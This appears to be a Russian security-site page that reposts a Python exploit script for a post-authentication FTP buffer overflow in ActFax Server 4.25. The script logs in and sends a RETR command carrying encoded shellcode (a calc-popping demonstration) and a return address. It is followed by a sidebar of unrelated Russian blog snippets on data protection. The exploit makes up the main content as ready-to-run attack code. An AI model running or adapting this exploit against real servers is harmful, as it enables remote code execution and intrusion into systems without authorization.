Эксплоиты

ActFax2-expl.pl

28 января, 2012

		#!/usr/bin/python
# Exploit Title: ActFax Server FTP Remote BOF (post auth)
# Date: Feb 15, 2011
# Author: chap0
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe
# Version: Version 4.25, Build 0221 (2010-02-11)
# Tested on: Windows XP SP3 en
# Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT
# Stay true my friends
import socket
print "\nActFax Server FTP Remote BOF"
print " chap0 - www.seek-truth.net \n"
# pops calc
calccode = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkXlqELKZL587Pep7PdoaxsSSQbLPcLMw5JXbpX8KwOcHBPwkON0A"
# push ebp #pop eax #sub eax,55555521 * 3 :)
junk = "\x55\x58\x2D\x21\x55\x55\x55\x2D\x21\x55\x55\x55\x2D\x21\x55\x55\x55" + "C"*135 + calccode + "A"*(616-len(calccode))
payload = junk + "\x37\x27\x40\x00" #RETN
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.2',21))
s.recv(1024)
s.send('USER ' + 'chapo\r\n')
print (s.recv(1024))
s.send('PASS chapo\r\n')
print (s.recv(1024))
s.send('RETR ' + payload + '\r\n')
s.close


                                                                                                                                                                                                                                               

Блоги
23.05.2012
Сей краткий пост, адресован, тем кто, так или иначе  интересуется вопросами управления рисками ...
23.05.2012
Недавно словили тут парочку злоинсайдеров: «Роберт Квок, бывший директор по управлению бизнес-...
23.05.2012
Если рассматривать построение технической системы защиты ПД, то одно из возможных решений, направлен...
23.05.2012
Коллеги, вчера через свой твиттер ( http://twitter.com/#!/nnikiforov)  новый глава Минкомсвязи ...
22.05.2012
Защита информации вопрос комплексный и требует обеспечения непрерывности защитного контура во времен...
22.05.2012
Вот вы говорите "электронная демократия". А ведь возможен и электронный авторитаризм. И электронная ...
22.05.2012
Опубликована программа PHD на русском и английском языках.
Russian
http://www...
22.05.2012
Прокуратура Советского района города Астрахани выявила нарушения федерального закона «О персон...
22.05.2012
17-18 мая Stonesoft устраивал Hack the Lab в Хельсинки. По сути мероприятие состояло из 2-х частей:Н...
21.05.2012
Так всегда бывает, что человечество сначала придумывает какую-то гениальную идею, потом строит вокру...